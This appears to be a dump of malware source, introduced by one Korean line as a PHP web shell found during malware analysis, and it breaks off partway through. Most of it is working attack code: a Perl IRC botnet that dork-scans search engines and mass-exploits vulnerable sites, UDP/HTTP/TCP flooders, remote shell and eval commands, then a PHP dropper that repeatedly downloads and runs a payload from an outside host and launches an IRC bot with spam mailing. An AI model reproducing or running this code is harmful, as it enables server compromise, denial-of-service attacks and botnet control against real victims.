sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Scan 12:. 1| 12 7AOL 1 ".scalar(@aollist)." 12Sites");
#
my @lycos=&lycos($dork);
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Scan 12:. 1| 12 1L 7yc 1o 7s 1 ".scalar(@lycos)." 12Sites");
#
my @ylist=&yahoo($dork);
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Scan 12:. 1| 12 13Y 6ahoo 1 ".scalar(@ylist)." 12Sites");
#
push(my @tot, @glist, @mlist, @alist, @allist, @asklist, @aollist, @lycos, @ylist );
my @puliti=&unici(@tot);
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Scan 12:. 1| 12 Total Results: 1 ".scalar(@tot)." 12Sites and Cleaned: 1 ".scalar(@puliti)." 12for 2 $dork ");
my $uni=scalar(@puliti);
foreach my $sito (@puliti)
{
$contatore++;
if ($contatore %30==0){
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Scan 12:. 1| 12 Exploiting 1 ".$contatore." 12of 1 ".$uni. " 12Sites");
}
if ($contatore==$uni-1){
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Scan 12:. 1| lemes wes 2 $dork");
}
### Print CMD and TEST CMD###
my $test="http://".$sito.$bug.$id."?";
my $print="http://".$sito.$bug.$cmd."?";
### End of Print CMD and TEST CMD###
my $req=HTTP::Request->new(GET=>$test);
my $ua=LWP::UserAgent->new();
$ua->timeout(5);
my $response=$ua->request($req);
if ($response->is_success) {
my $re=$response->content;
if($re =~ /Mic22/ && $re =~ /uid=/){
my $hs=geths($print); $hosts{$hs}++;
if($hosts{$hs}=="1"){
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Safe Mode = 1OFF 12:. 1| 12 12Vuln: 1$print ");
}}
elsif($re =~ /Mic22/)
{
my $hs=geths($print); $hosts{$hs}++;
if($hosts{$hs}=="1"){
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Safe Mode = 3ON 12:. 1| 12 12Vuln: 1$print ");
}}
}}}
exit;
}}}
######################
#End of MultiSCANNER #
# #
######################
########################################################################################################################
# ______ __ ___ _ __ ___ __ __ #
#/_ __/ / / ___ / _ \ (_) / /_ / _ ) __ __ / / / / #
# / / / _ \/ -_) / ___/ / / / __/ / _ |/ // / / / / / #
#/_/ /_//_/\__/ /_/ /_/ \__/ /____/ \_,_/ /_/ /_/ #
# #
########################################################################################################################
# RESERVED xD
########################################################################################################################
# ______ __ ___ _ __ ___ __ __ #
#/_ __/ / / ___ / _ \ (_) / /_ / _ ) __ __ / / / / #
# / / / _ \/ -_) / ___/ / / / __/ / _ |/ // / / / / / #
#/_/ /_//_/\__/ /_/ /_/ \__/ /____/ \_,_/ /_/ /_/ #
# #
########################################################################################################################
######################
# HTTPFlood #
# #
######################
if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1HTTP DDos 12:. 1| 12 Attacking 1 ".$1." 12 on port 80 for 1 ".$2." 12 seconds .");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1HTTP DDos 12:. 1| 12 Attacking done 1 ".$1.".");
}
######################
# End of HTTPFlood #
# #
######################
########################################################################################################################
# ______ __ ___ _ __ ___ __ __ #
#/_ __/ / / ___ / _ \ (_) / /_ / _ ) __ __ / / / / #
# / / / _ \/ -_) / ___/ / / / __/ / _ |/ // / / / / / #
#/_/ /_//_/\__/ /_/ /_/ \__/ /____/ \_,_/ /_/ /_/ #
# #
########################################################################################################################
######################
# UDPFlood #
# #
######################
if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1UDP DDos 12:. 1| 12 Attacking 1 ".$1." 12 with 1 ".$2." 12 Kb Packets for 1 ".$3." 12 seconds. ");
my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1UDP DDos 12:. 1| 12 12Results 1 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 12Kb in 1 ".$dtime." 12seconds to 1 ".$1.".");
}
exit;
}
}
######################
# End of Udpflood #
# #
######################

sub ircase {
my ($kem, $printl, $case) = @_;
if ($case =~ /^join (.*)/) {
j("$1");
}
if ($case =~ /^part (.*)/) {
p("$1");
}
if ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
}
else {
p("$chan");
j("$chan");
}
}

if ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}

if ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}

if ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}

if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}

if ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
}

if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}

if ($case =~ /^nick (.*)/) {
nick("$1");
}

if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", 6667);
}

if ($case =~ /^raw (.*)/) {
sendraw("$1");
}

if ($case =~ /^eval (.*)/) {
eval "$1";
}
}

sub shell {
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "No such file or directory");
return;
}

elsif ($pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit;

} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
if ($c == "$linas_max") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}

sub tcpflooder {
my $itime = time;
my ($cur_time);
my ($ia,$pa,$proto,$j,$l,$t);
$ia=inet_aton($_[0]);
$pa=sockaddr_in($_[1],$ia);
$ftime=$_[2];
$proto=getprotobyname('tcp');
$j=0;$l=0;
$cur_time = time - $itime;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
socket($t,PF_INET,SOCK_STREAM,$proto);
connect($t,$pa)||$j--;
$j++;$l++;
}
$l=0;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
shutdown($t,2);
$l++;
}
}

sub udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $porta = 1;
$porta <= 65000; $porta++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;

for (my $pc = 3;
$pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}

sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}

sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}

sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}

sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}

sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}

sub j {
&join(@_);
}

sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");

}
sub p { part(@_);
}

sub part {
sendraw("PART $_[0]");
}

sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}

sub quit {
sendraw("QUIT :$_[0]");
}

sub fetch(){
my $rnd=(int(rand(9999)));
my $n= 80;
if ($rnd<5000) { $n<<=1;}
my $s= (int(rand(10)) * $n);
{
my @dominios = ("removed-them-all");
my @str;
foreach $dom (@dominios)
{
push (@str,"@gstring");
}
my $query="www.google.com/search?q=";
$query.=$str[(rand(scalar(@str)))];
$query.="&num=$n&start=$s";
my @lst=();
sendraw("privmsg #debug :DEBUG only test googling: ".$query."");
my $page = http_query($query);
while ($page =~ m/<a href=\"?http:\/\/([^>\"]+)\"? class=l>/g){
if ($1 !~ m/google|cache|translate/){
push (@lst,$1);
}
}
return (@lst);
}

sub yahoo(){
my @lst;
my $key = $_[0];
for($b=1;$b<=1000;$b+=100){
my $Ya=("http://search.yahoo.com/search?ei=UTF-8&p=".key($key)."&n=100&fr=sfp&b=".$b);
my $Res=query($Ya);
while($Res =~ m/\(.+?)\<\/span>/g){
my $k=$1;
$k=~s///g;
$k=~s/<\/b>//g;
$k=~s///g;
my @grep=links($k);
push(@lst,@grep);
}}
return @lst;
}

sub msn(){
my @lst;
my $key = $_[0];
for($b=1;$b<=1000;$b+=10){
my $MsN=("http://search.live.com/results.aspx?q=".key($key)."&first=".$b."&FORM=PERE");
my $Res=query($MsN);
while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
if($1 !~ /msn|live/){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}}}
return @lst;
}

sub lycos(){
my $inizio=0;
my $pagine=20;
my $key=$_[0];
my $av=0;
my @lst;
while($inizio <= $pagine){
my $lycos="http://search.lycos.com/?query=".key($key)."&page=$av";
my $Res=query($lycos);
while ($Res=~ m/http:\/\/(.+?)\//g ){
my $k="$1";
my @grep=links($k);
push(@lst,@grep);
}
$inizio++;
$av++;
}
return @lst;
}

#####
sub aol(){
my @lst;
my $key = $_[0];
for($b=1;$b<=100;$b++){
my $AoL=("http://search.aol.com/aol/search?query=".key($key)."&page=".$b."&nt=null&ie=UTF-8");
my $Res=query($AoL);
while($Res =~ m/http:\/\/(.+?)\<\/p>/g){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}}
return @lst;
}
#####
sub ask(){
my @lst;
my $key=$_[0];
my $i=0;
my $pg=0;
for($i=0; $i<=1000; $i+=10)
{
my $Ask=("http://it.ask.com/web?q=".key($key)."&o=312&l=dir&qsrc=0&page=".$i."&dm=all");
my $Res=query($Ask);
while($Res=~m/<a id=\"(.*?)\" class=\"(.*?)\" href=\"(.+?)\onmousedown/g){
my $k=$3;
$k=~s/[\"\ ]//g;
my @grep=links($k);
push(@lst,@grep);
}}
return @lst;
}
#####
sub alltheweb()
{
my @lst;
my $key=$_[0];
my $i=0;
my $pg=0;
for($i=0; $i<=1000; $i+=100)
{
my $all=("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i);
my $Res=query($all);
while($Res =~ m/http:\/\/(.+?)\<\/span>/g){
my $k=$1;
$k=~s/ //g;
my @grep=links($k);
push(@lst,@grep);
}}
return @lst;
}

sub google(){
my @lst;
my $key = $_[0];
for($b=0;$b<=100;$b+=100){
my $Go=("http://www.google.co.ma/search?q=".key($key)."&num=100&filter=0&start=".$b);
my $Res=query($Go);
while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
if ($1 !~ /google/){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}}}
return @lst;
}

sub links()
{
my @l;
my $link=$_[0];
my $host=$_[0];
my $hdir=$_[0];
$hdir=~s/(.*)\/[^\/]*$/\1/;
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$host.="/";
$link.="/";
$hdir.="/";
$host=~s/\/\//\//g;
$hdir=~s/\/\//\//g;
$link=~s/\/\//\//g;
push(@l,$link,$host,$hdir);
return @l;
}

sub geths(){
my $host=$_[0];
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
return $host;
}

sub key(){
my $chiave=$_[0];
$chiave =~ s/ /\+/g;
$chiave =~ s/:/\%3A/g;
$chiave =~ s/\//\%2F/g;
$chiave =~ s/&/\%26/g;
$chiave =~ s/\"/\%22/g;
$chiave =~ s/,/\%2C/g;
$chiave =~ s/\\/\%5C/g;
return $chiave;
}

sub query($){
my $url=$_[0];
$url=~s/http:\/\///;
my $host=$url;
my $query=$url;
my $page="";
$host=~s/href=\"?http:\/\///;
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query=~s/$host//;
if ($query eq "") {$query="/";};
eval {
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
close($sock);
};
return $page;
}

sub unici{
my @unici = ();
my %visti = ();
foreach my $elemento ( @_ )
{
next if $visti{ $elemento }++;
push @unici, $elemento;
}
return @unici;
}

sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
eval {
local $SIG{ALRM} = sub { die "1";};
alarm 10;
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
alarm 0;
close($sock);
};
return $page;
}
}

########################################################################################################################
# ______ __ ___ _ __ ___ __ __ #
#/_ __/ / / ___ / _ \ (_) / /_ / _ ) __ __ / / / / #
# / / / _ \/ -_) / ___/ / / / __/ / _ |/ // / / / / / #
#/_/ /_//_/\__/ /_/ /_/ \__/ /____/ \_,_/ /_/ /_/ #
# #
########################################################################################################################

예전에 악성코드 분석하다 찾은 php 웹쉘(allnet.jpg)

<?php
set_time_limit(0);
error_reporting(0);

$url[2] = "http://bintaunacity.byethost24.com/osco/pret.jpg";
$sfe[2] = "Bin";
exec(); shell_exec(); system(); passthru();
exec("wget ".$url[2]." -O ".$sfe[2]."; chmod 755 ".$sfe[2]."; perl ".$sfe[2]."*");
exec("fetch -O ".$sfe[2]." ".$url[2]."; chmod 755 ".$sfe[2]."; perl ".$sfe[2]."*");
exec("cUrl -O ".$sfe[2]." ".$url[2]."; chmod 755 ".$sfe[2]."; perl ".$sfe[2]."*");
exec("lynx -dump ".$url[2]." ".$sfe[2]."; chmod 755 ".$sfe[2]."; perl ".$sfe[2]."*");
exec("GET ".$url[2].">".$sfe[2]."; chmod 755 ".$sfe[2]."; perl ".$sfe[2]."*");
exec("lwp-download ".$url[2]." ".$sfe[2]."; chmod 755 ".$sfe[2]."; perl ".$sfe[2]."*");
shell_exec("wget ".$url[2]." -O ".$sfe[2]."; chmod 755 ".$sfe[2]."; perl ".$sfe[2]."*");
shell_exec("fetch -O ".$sfe[2]." ".$url[2]."; chmod 755 ".$sfe[2]."; perl ".$sfe[2]."*");
shell_exec("cUrl -O ".$sfe[2]." ".$url[2]."; chmod 755 ".$sfe[2]."; perl ".$sfe[2]."*");
shell_exec("lynx -dump ".$url[2]." ".$sfe[2]."; chmod 755 ".$sfe[2]."; perl ".$sfe[2]."*");
shell_exec("GET ".$url[2].">".$sfe[2]."; chmod 755 ".$sfe[2]."; perl ".$sfe[2]."*");
shell_exec("lwp-download ".$url[2]." ".$sfe[2]."; chmod 755 ".$sfe[2]."; perl ".$sfe[2]."*");
system("wget ".$url[2]." -O ".$sfe[2]."; chmod 755 ".$sfe[2]."; perl ".$sfe[2]."*");
system("fetch -O ".$sfe[2]." ".$url[2]."; chmod 755 ".$sfe[2]."; perl ".$sfe[2]."*");
system("cUrl -O ".$sfe[2]." ".$url[2]."; chmod 755 ".$sfe[2]."; perl ".$sfe[2]."*");
system("lynx -dump ".$url[2]." ".$sfe[2]."; chmod 755 ".$sfe[2]."; perl ".$sfe[2]."*");
system("GET ".$url[2].">".$sfe[2]."; chmod 755 ".$sfe[2]."; perl ".$sfe[2]."*");
system("lwp-download ".$url[2]." ".$sfe[2]."; chmod 755 ".$sfe[2]."; perl ".$sfe[2]."*");
passthru("wget ".$url[2]." -O ".$sfe[2]."; chmod 755 ".$sfe[2]."; perl ".$sfe[2]."*");
passthru("fetch -O ".$sfe[2]." ".$url[2]."; chmod 755 ".$sfe[2]."; perl ".$sfe[2]."*");
passthru("cUrl -O ".$sfe[2]." ".$url[2]."; chmod 755 ".$sfe[2]."; perl ".$sfe[2]."*");
passthru("lynx -dump ".$url[2]." ".$sfe[2]."; chmod 755 ".$sfe[2]."; perl ".$sfe[2]."*");
passthru("GET ".$url[2].">".$sfe[2]."; chmod 755 ".$sfe[2]."; perl ".$sfe[2]."*");
passthru("lwp-download ".$url[2]." ".$sfe[2]."; chmod 755 ".$sfe[2]."; perl ".$sfe[2]."*");
//-- /tmp
exec("wget ".$url[2]." -O /tmp/".$sfe[2]."; chmod 755 /tmp/".$sfe[2]."; perl /tmp/".$sfe[2]."*");
exec("fetch -O /tmp/".$sfe[2]." ".$url[2]."; chmod 755 /tmp/".$sfe[2]."; perl /tmp/".$sfe[2]."*");
exec("cUrl -O /tmp/".$sfe[2]." ".$url[2]."; chmod 755 /tmp/".$sfe[2]."; perl /tmp/".$sfe[2]."*");
exec("lynx -dump ".$url[2]." /tmp/".$sfe[2]."; chmod 755 /tmp/".$sfe[2]."; perl /tmp/".$sfe[2]."*");
exec("GET ".$url[2].">/tmp/".$sfe[2]."; chmod 755 /tmp/".$sfe[2]."; perl /tmp/".$sfe[2]."*");
exec("lwp-download ".$url[2]." /tmp/".$sfe[2]."; chmod 755 /tmp/".$sfe[2]."; perl /tmp/".$sfe[2]."*");
shell_exec("wget ".$url[2]." -O /tmp/".$sfe[2]."; chmod 755 /tmp/".$sfe[2]."; perl /tmp/".$sfe[2]."*");
shell_exec("fetch -O /tmp/".$sfe[2]." ".$url[2]."; chmod 755 /tmp/".$sfe[2]."; perl /tmp/".$sfe[2]."*");
shell_exec("cUrl -O /tmp/".$sfe[2]." ".$url[2]."; chmod 755 /tmp/".$sfe[2]."; perl /tmp/".$sfe[2]."*");
shell_exec("lynx -dump ".$url[2]." /tmp/".$sfe[2]."; chmod 755 /tmp/".$sfe[2]."; perl /tmp/".$sfe[2]."*");
shell_exec("GET ".$url[2].">/tmp/".$sfe[2]."; chmod 755 /tmp/".$sfe[2]."; perl /tmp/".$sfe[2]."*");
shell_exec("lwp-download ".$url[2]." /tmp/".$sfe[2]."; chmod 755 /tmp/".$sfe[2]."; perl /tmp/".$sfe[2]."*");
system("wget ".$url[2]." -O /tmp/".$sfe[2]."; chmod 755 /tmp/".$sfe[2]."; perl /tmp/".$sfe[2]."*");
system("fetch -O /tmp/".$sfe[2]." ".$url[2]."; chmod 755 /tmp/".$sfe[2]."; perl /tmp/".$sfe[2]."*");
system("cUrl -O /tmp/".$sfe[2]." ".$url[2]."; chmod 755 /tmp/".$sfe[2]."; perl /tmp/".$sfe[2]."*");
system("lynx -dump ".$url[2]." /tmp/".$sfe[2]."; chmod 755 /tmp/".$sfe[2]."; perl /tmp/".$sfe[2]."*");
system("GET ".$url[2].">/tmp/".$sfe[2]."; chmod 755 /tmp/".$sfe[2]."; perl /tmp/".$sfe[2]."*");
system("lwp-download ".$url[2]." /tmp/".$sfe[2]."; chmod 755 /tmp/".$sfe[2]."; perl /tmp/".$sfe[2]."*");
passthru("wget ".$url[2]." -O /tmp/".$sfe[2]."; chmod 755 /tmp/".$sfe[2]."; perl /tmp/".$sfe[2]."*");
passthru("fetch -O /tmp/".$sfe[2]." ".$url[2]."; chmod 755 /tmp/".$sfe[2]."; perl /tmp/".$sfe[2]."*");
passthru("cUrl -O /tmp/".$sfe[2]." ".$url[2]."; chmod 755 /tmp/".$sfe[2]."; perl /tmp/".$sfe[2]."*");
passthru("lynx -dump ".$url[2]." /tmp/".$sfe[2]."; chmod 755 /tmp/".$sfe[2]."; perl /tmp/".$sfe[2]."*");
passthru("GET ".$url[2].">/tmp/".$sfe[2]."; chmod 755 /tmp/".$sfe[2]."; perl /tmp/".$sfe[2]."*");
passthru("lwp-download ".$url[2]." /tmp/".$sfe[2]."; chmod 755 /tmp/".$sfe[2]."; perl /tmp/".$sfe[2]."*");
//-- /var/tmp
exec("wget ".$url[2]." -O /var/tmp/".$sfe[2]."; chmod 755 /var/tmp/".$sfe[2]."; perl /var/tmp/".$sfe[2]."*");
exec("fetch -O /var/tmp/".$sfe[2]." ".$url[2]."; chmod 755 /var/tmp/".$sfe[2]."; perl /var/tmp/".$sfe[2]."*");
exec("cUrl -O /var/tmp/".$sfe[2]." ".$url[2]."; chmod 755 /var/tmp/".$sfe[2]."; perl /var/tmp/".$sfe[2]."*");
exec("lynx -dump ".$url[2]." /var/tmp/".$sfe[2]."; chmod 755 /var/tmp/".$sfe[2]."; perl /var/tmp/".$sfe[2]."*");
exec("GET ".$url[2].">/var/tmp/".$sfe[2]."; chmod 755 /var/tmp/".$sfe[2]."; perl /var/tmp/".$sfe[2]."*");
exec("lwp-download ".$url[2]." /var/tmp/".$sfe[2]."; chmod 755 /var/tmp/".$sfe[2]."; perl /var/tmp/".$sfe[2]."*");
shell_exec("wget ".$url[2]." -O /var/tmp/".$sfe[2]."; chmod 755 /var/tmp/".$sfe[2]."; perl /var/tmp/".$sfe[2]."*");
shell_exec("fetch -O /var/tmp/".$sfe[2]." ".$url[2]."; chmod 755 /var/tmp/".$sfe[2]."; perl /var/tmp/".$sfe[2]."*");
shell_exec("cUrl -O /var/tmp/".$sfe[2]." ".$url[2]."; chmod 755 /var/tmp/".$sfe[2]."; perl /var/tmp/".$sfe[2]."*");
shell_exec("lynx -dump ".$url[2]." /var/tmp/".$sfe[2]."; chmod 755 /var/tmp/".$sfe[2]."; perl /var/tmp/".$sfe[2]."*");
shell_exec("GET ".$url[2].">/var/tmp/".$sfe[2]."; chmod 755 /var/tmp/".$sfe[2]."; perl /var/tmp/".$sfe[2]."*");
shell_exec("lwp-download ".$url[2]." /var/tmp/".$sfe[2]."; chmod 755 /var/tmp/".$sfe[2]."; perl /var/tmp/".$sfe[2]."*");
system("wget ".$url[2]." -O /var/tmp/".$sfe[2]."; chmod 755 /var/tmp/".$sfe[2]."; perl /var/tmp/".$sfe[2]."*");
system("fetch -O /var/tmp/".$sfe[2]." ".$url[2]."; chmod 755 /var/tmp/".$sfe[2]."; perl /var/tmp/".$sfe[2]."*");
system("cUrl -O /var/tmp/".$sfe[2]." ".$url[2]."; chmod 755 /var/tmp/".$sfe[2]."; perl /var/tmp/".$sfe[2]."*");
system("lynx -dump ".$url[2]." /var/tmp/".$sfe[2]."; chmod 755 /var/tmp/".$sfe[2]."; perl /var/tmp/".$sfe[2]."*");
system("GET ".$url[2].">/var/tmp/".$sfe[2]."; chmod 755 /var/tmp/".$sfe[2]."; perl /var/tmp/".$sfe[2]."*");
system("lwp-download ".$url[2]." /var/tmp/".$sfe[2]."; chmod 755 /var/tmp/".$sfe[2]."; perl /var/tmp/".$sfe[2]."*");
passthru("wget ".$url[2]." -O /var/tmp/".$sfe[2]."; chmod 755 /var/tmp/".$sfe[2]."; perl /var/tmp/".$sfe[2]."*");
passthru("fetch -O /var/tmp/".$sfe[2]." ".$url[2]."; chmod 755 /var/tmp/".$sfe[2]."; perl /var/tmp/".$sfe[2]."*");
passthru("cUrl -O /var/tmp/".$sfe[2]." ".$url[2]."; chmod 755 /var/tmp/".$sfe[2]."; perl /var/tmp/".$sfe[2]."*");
passthru("lynx -dump ".$url[2]." /var/tmp/".$sfe[2]."; chmod 755 /var/tmp/".$sfe[2]."; perl /var/tmp/".$sfe[2]."*");
passthru("GET ".$url[2].">/var/tmp/".$sfe[2]."; chmod 755 /var/tmp/".$sfe[2]."; perl /var/tmp/".$sfe[2]."*");
passthru("lwp-download ".$url[2]." /var/tmp/".$sfe[2]."; chmod 755 /var/tmp/".$sfe[2]."; perl /var/tmp/".$sfe[2]."*");

set_time_limit(0);
error_reporting(0);
echo "ok!";

class pBot
{
var $config = array("server"=>"irc.ps-x.org",
"port"=>"6667",
"pass"=>"",
"prefix"=>"BINTAUNA|",
"maxrand"=>"5",
"chan"=>"#BINTAUNA",
"chan2"=>"#BINTAUNA",
"key"=>"on",
"modes"=>"+p",
"password"=>"hus",
"trigger"=>".",
"hostauth"=>"NTU.PS-X.ORG" // * for any hostname ( remember: /setvhost lAgi.seRius.sCan )
);
var $users = array();
function start()
{
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))
$this->start();
$ident = $this->config['prefix'];
$alph = range("0","100");
for($i=0;$i<$this->config['maxrand'];$i++)
$ident .= $alph[rand(0,100)];
if(strlen($this->config['pass'])>0)
$this->send("PASS ".$this->config['pass']);
$this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
$this->set_nick();
$this->main();
}
function main()
{
while(!feof($this->conn))
{
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(" ",$this->buf);
if(substr($this->buf,0,6)=="PING :")
{
$this->send("PONG :".substr($this->buf,6));
}
if(isset($cmd[1]) && $cmd[1] =="001")
{
$this->send("MODE ".$this->nick." ".$this->config['modes']);
$this->join($this->config['chan'],$this->config['key']);
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan2'],"[\2uname!\2]: $uname (safe: $safemode)");
$this->privmsg($this->config['chan2'],"[\2vuln!\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER

['REQUEST_URI']."");
}
if(isset($cmd[1]) && $cmd[1]=="433")
{
$this->set_nick();
}
if($this->buf != $old_buf)
{
$mcmd = array();
$msg = substr(strstr($this->buf," :"),2);
$msgcmd = explode(" ",$msg);
$nick = explode("!",$cmd[0]);
$vhost = explode("@",$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick)
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i+1];
}
else
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i];
}
if(count($cmd)>2)
{
switch($cmd[1])
{
case "QUIT":
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PART":
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PRIVMSG":
if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] ==

"*"))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case "user":
if($mcmd[1]==$this->config['password'])
{
$this->log_in($host);
}
else
{
$this->notice($this->config['chan'],"[\2Auth\2]: Senha errada $nick idiota!!");
}
break;
}
}
}
elseif($this->is_logged_in($host))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case "restart":
$this->send("QUIT :restart commando from $nick");
fclose($this->conn);
$this->start();
break;
case "mail": //mail to from subject message
if(count($mcmd)>4)
{
$header = "From: <".$mcmd[2].">";
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
{
$this->privmsg($this->config['chan'],"[\2mail\2]: Impossivel mandar e-mail.");
}
else
{
$this->privmsg($this->config['chan'],"[\2mail\2]: Mensagem enviada para \2".$mcmd

[1]."\2");
}
}
break;
case "safe":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = "on";
}
else {
$safemode = "off";
}
$this->privmsg($this->config['chan'],"[\2safe mode\2]: ".$safemode."");
break;
case "inbox": //teste inbox
if(isset($mcmd[1]))
{
$token = md5(uniqid(rand(), true));
$header = "From: <inbox".$token."@xdevil.org>";
$a = php_uname();
$b = getenv("SERVER_SOFTWARE");
$c = gethostbyname($_SERVER["HTTP_HOST"]);
